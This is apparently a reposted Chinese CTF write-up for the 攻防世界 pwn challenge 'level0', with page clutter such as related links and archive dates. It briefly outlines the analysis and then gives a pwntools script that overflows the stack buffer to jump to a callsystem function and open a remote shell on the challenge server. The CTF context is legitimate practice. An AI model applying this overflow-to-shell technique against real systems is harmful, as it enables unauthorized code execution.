攻防世界—pwn—level0

其他 2020-04-03 19:17:29 阅读次数: 0

题目分析

下载文件后首先使用checksec检查文件保护机制

文件名太长了，就更改了一下

发现是一个64位程序，使用ida查看伪代码

注意到一个特殊的函数名callsystem

确定思路，直接栈溢出

信息收集

确定偏移量

/bin/sh地址

方法1

方法2

编写脚本

from pwn import *

p = remote('111.198.29.45',32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()

本地测试

靶机测试

猜你喜欢

转载自www.cnblogs.com/anweilx/p/12628337.html

攻防世界—pwn—level0

攻防世界level0 + (Jarvis Oj)(Pwn) level1

[CTF-PWN]攻防世界新手村-level0[wp]

(Jarvis Oj)(Pwn) level0

Jarvis OJ（PWN）level0

[Jarvis OJ - PWN]——[XMAN]level0

Jarvis Oj Pwn 学习笔记-level0

18.9.18 Jarvis OJ PWN----[XMAN]level0

攻防世界—pwn—level2

攻防世界PWN题 level3

攻防世界(pwn) level3

攻防世界-wp-PWN-新手区-1-level0

jarvis oj level0

攻防世界_pwn_level2(萌新版)

攻防世界 pwn welpwn

攻防世界 pwn string

Jarvis OJ　[XMAN]level0

XCTF level0 write up

pwn_level0

攻防世界—pwn—hello_pwn

攻防世界PWN题 pwn-100

攻防世界 pwn100&&pwn200

攻防世界-PWN-hello_pwn

攻防世界(Pwn) PWN100

攻防世界 | hello_pwn

攻防世界 pwn-200

[攻防世界]pwn1

攻防世界--hello_pwn

攻防世界PWN题 string

攻防世界PWN题 forgot

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

更多

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)